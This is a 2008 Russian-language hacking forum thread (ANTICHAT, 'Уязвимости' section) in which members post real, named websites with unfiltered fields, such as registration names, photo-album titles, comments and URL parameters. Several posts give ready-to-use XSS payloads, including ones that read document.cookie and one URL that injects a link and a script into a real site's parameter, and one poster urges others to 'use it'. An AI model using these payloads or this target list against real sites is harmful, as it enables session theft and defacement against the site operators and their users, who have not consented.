HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 28.04.2008, 20:14
Travka
Новичок
Регистрация: 24.10.2006
Сообщений: 1
С нами: 10288356

Репутация: 4
По умолчанию

http://memori.ru
регаемся
в поле имя или фамилия пишем
<script>alert()</script>
смотрим профиль
 
Ответить с цитированием

  #172  
Старый 28.04.2008, 20:20
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

www.33hochu.ru

Нашел вначале пассивную

Зарегался думаю может еще что есть интересненькое?

ГЫ, конечно есть, проходим несложную регистрацию, и в своем профайле создаем фотоальбом а в названии пишем наш код

например --></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>


можно так "><script>alert(document.cookie)</script>

еще можно раскрыть пути и пощупать на предмет (мусколь стопудова стоит) инжекции

http://www.33hochu.ru/antixy

вот что получилось ))
все, работает и в опере и в лисе

Последний раз редактировалось xcedz; 28.04.2008 в 20:44..
 
Ответить с цитированием

  #173  
Старый 05.05.2008, 19:02
echobyte
Постоянный
Регистрация: 07.03.2008
Сообщений: 568
С нами: 9567626

Репутация: 708


По умолчанию

www.pcweek.ru

уязвимы комментарии

пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment
 
Ответить с цитированием

  #174  
Старый 07.05.2008, 19:28
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

хытитипи ввв.stroyazbuka.com/web/registration.php

так вот. регестрируемся в каталоге. в поле регион можно внедрить свой код ))

так же есть и пассивная. (говорю тока о xss ))) есть и другие темы )
 
Ответить с цитированием

  #175  
Старый 11.05.2008, 11:08
YoYo Factory
Участник форума
Регистрация: 25.03.2008
Сообщений: 138
С нами: 9542501

Репутация: 201
По умолчанию

/

Уязвима Регистрация
Ни одно поле не фильтруется

"><script>('XSS')</script>

Последний раз редактировалось YoYo Factory; 11.05.2008 в 11:11..
 
Ответить с цитированием

  #176  
Старый 13.05.2008, 11:42
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
С нами: 9661106

Репутация: 301
По умолчанию

хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))
Код:
http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #177  
Старый 13.05.2008, 15:53
ДеЦл
Banned
Регистрация: 07.05.2008
Сообщений: 33
С нами: 9479906

Репутация: 35
По умолчанию

ИдиВЖопу.ру

Уязвимы поля "текст под картинкой" и "над картинкой"
Пример:

Цитата:
http://idi-v-zhopu.ru/?166
(с) Лигендо...
 
Ответить с цитированием

  #178  
Старый 13.05.2008, 19:41
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Заводи ак создаем вакансию.

http://www.jobportal.com.ua/vacancy/499117.html

(портфолио разработчика http://www.globalweb.kiev.ua/portfolio/)

Последний раз редактировалось xcedz; 13.05.2008 в 20:03..
 
Ответить с цитированием

  #179  
Старый 18.05.2008, 13:58
М.Боярский
Banned
Регистрация: 05.05.2008
Сообщений: 28
С нами: 9482786

Репутация: 50
По умолчанию

Kanalia.ru - сайт обо мне!
в каментах галлереи не фильтруеццо имя отправителя
http://kanalia.ru/gallery/
 
Ответить с цитированием

  #180  
Старый 23.05.2008, 00:05
echobyte
Постоянный
Регистрация: 07.03.2008
Сообщений: 568
С нами: 9567626

Репутация: 708


По умолчанию

 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.